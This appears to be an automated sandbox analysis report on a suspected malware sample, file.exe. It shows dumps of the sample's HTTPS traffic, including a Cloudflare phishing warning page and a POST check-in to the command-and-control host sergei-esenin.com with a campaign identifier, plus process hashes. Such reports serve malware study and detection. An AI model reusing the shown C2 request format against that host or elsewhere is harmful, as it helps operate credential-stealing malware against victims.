                                                                2024-10-13 15:46:15 UTC814INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                2024-10-13 15:46:15 UTC1369INData Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27
                                                                Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
                                                                2024-10-13 15:46:15 UTC1369INData Raw: 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69
                                                                Data Ascii: agement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <i
                                                                2024-10-13 15:46:15 UTC889INData Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62
                                                                Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
                                                                2024-10-13 15:46:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.749719172.67.206.2044437352C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-13 15:46:16 UTC354OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cookie: __cf_mw_byp=cKYJNG4PUdZgy2T2WC.4u4JOPeXDHIGLF0EcZVHEveg-1728834375-0.0.1.1-/api
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 52
                                                                Host: sergei-esenin.com
                                                                2024-10-13 15:46:16 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                2024-10-13 15:46:16 UTC831INHTTP/1.1 200 OK
                                                                Date: Sun, 13 Oct 2024 15:46:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=k77go9c8npgvj0h1f33gsensl9; expires=Thu, 06 Feb 2025 09:32:55 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mFXD6ZAQU%2F4uPAOy4ePs58HTBYnoGgbX5O%2BnTcsXcgLEnWUsrLRxn%2F0wFJ1Fqz6cKjfw51SBuL%2BBdWJFyaW5AeirnSAH2lOVbpcbWqAm3HEpdq2Gk56%2FFlT0ccODmPmNZyPRow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d207622dc581a07-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-13 15:46:16 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-10-13 15:46:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:11:46:09
                                                                Start date:13/10/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x6a0000
                                                                File size:1'844'224 bytes
                                                                MD5 hash:FB08A9067FAE7BFD248416C863BD43D2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:11:46:16
                                                                Start date:13/10/2024
                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1920
                                                                Imagebase:0xd00000
                                                                File size:483'680 bytes
                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                No disassembly